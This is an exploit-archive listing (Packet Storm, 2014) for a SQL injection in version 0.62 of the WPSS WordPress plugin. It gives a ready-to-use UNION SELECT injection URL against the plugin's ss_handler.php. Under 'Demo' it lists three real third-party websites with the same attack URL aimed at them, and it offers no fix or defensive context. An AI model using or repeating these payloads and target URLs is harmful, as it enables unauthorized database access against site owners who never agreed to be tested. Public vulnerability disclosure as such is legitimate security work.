WordPress WPSS 0.62 SQL Injection

2014-08-06T00:00:00
ID PACKETSTORM:127771
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2014-08-06T00:00:00

Description

                                        
                                            `|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|  
|-------------------------------------------------------------------------|  
| [*] Exploit Title: Wordpress WPSS V 0.62 Plugin Sql injection  
|  
| [*] Exploit Author: Ashiyane Digital Security Team  
|  
| [*] Date : Date: 2014-08-05  
|  
| [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71  
|  
| [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip  
|  
| [*] Version : 0.62  
|  
| [*] Tested on: Windows , Mozila Firefox  
|-------------------------------------------------------------------------|  
| [*] PoC :  
|  
| [*]   
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#  
|  
|-------------------------------------------------------------------------|  
| [*] Demo:  
|  
| [*]   
http://www.tahoebusinesses.com//wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#  
|  
| [*]   
http://www.forzabykemp.com/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#  
|  
| [*]   
http://calgarysalesteam.com/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#  
|  
|-------------------------------------------------------------------------|  
| [*]Discovered By : ACC3SS  
|-------------------------------------------------------------------------|  
|-------------------------------------------------------------------------|  
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|  
`